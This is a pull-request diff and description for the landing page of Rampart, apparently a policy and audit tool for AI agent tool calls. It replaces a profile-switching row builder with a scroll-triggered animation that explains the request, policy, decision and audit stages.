-    animTimers = [];
-
-    var p = profiles[key];
-    document.getElementById('profile-header').textContent = p.header;
-    document.getElementById('profile-footer').innerHTML = p.footer;
-
-    // Build rows (hidden initially)
-    var container = document.getElementById('watch-rows');
-    container.innerHTML = '';
-    container.classList.remove('animate');
-
-    p.rows.forEach(function(row) {
-        var div = document.createElement('div');
-        div.className = 'watch-row ' + row.cls;
-        div.innerHTML =
-            '<div class="watch-icon">' + row.icon + '</div>' +
-            '<div class="watch-time">' + row.time + '</div>' +
-            '<div class="watch-tool">' + row.tool + '</div>' +
-            '<div class="watch-cmd">' + row.cmd + '</div>' +
-            '<div class="watch-policy">' + row.tag + '</div>';
-        container.appendChild(div);
-    });
-
-    // Trigger staggered animation
-    void container.offsetWidth; // force reflow
-    container.classList.add('animate');
-}
-
-// Load default profile
-switchProfile('standard', null);
-// Set first tab active on load
-document.querySelector('.policy-tab').classList.add('active');
+(function() {
+    var steps = Array.prototype.slice.call(document.querySelectorAll('[data-flow-step]'));
+    var rows = Array.prototype.slice.call(document.querySelectorAll('[data-flow-row]'));
+    var stage = document.getElementById('flow-stage');
+    var detail = document.getElementById('flow-detail');
+    var labels = [
+        ['request', 'tool call normalized before policy evaluation'],
+        ['policy', 'local YAML rules decide the common case in microseconds'],
+        ['decision', 'allow, ask, deny, or redact before execution'],
+        ['audit', 'every decision lands in a hash-chained local record']
+    ];
+    if (!steps.length) return;
+    var flowObserver = new IntersectionObserver(function(entries) {
+        entries.forEach(function(entry) {
+            if (!entry.isIntersecting) return;
+            var index = Number(entry.target.getAttribute('data-flow-step'));
+            rows.forEach(function(row, rowIndex) { row.classList.toggle('active', rowIndex === index); });
+            stage.textContent = labels[index][0];
+            detail.textContent = labels[index][1];
+        });
+    }, { threshold: 0.55 });
+    steps.forEach(function(step) { flowObserver.observe(step); });
+})();
 </script>
-<script data-goatcounter="https://rampart.goatcounter.com/count"
-        async src="//gc.zgo.at/count.js"></script>
+<script data-goatcounter="https://rampart.goatcounter.com/count" async src="//gc.zgo.at/count.js"></script>
 </body>
 </html>


### PR DESCRIPTION
## Summary
- refine the Rampart landing page with a calmer, more cohesive desktop presentation
- improve mobile behavior for hero/watch/integration/install sections
- scrub landing-page claims so copy matches current repo-backed product behavior

## Testing
- python3 HTML parse check
- local http preview served and spot-checked
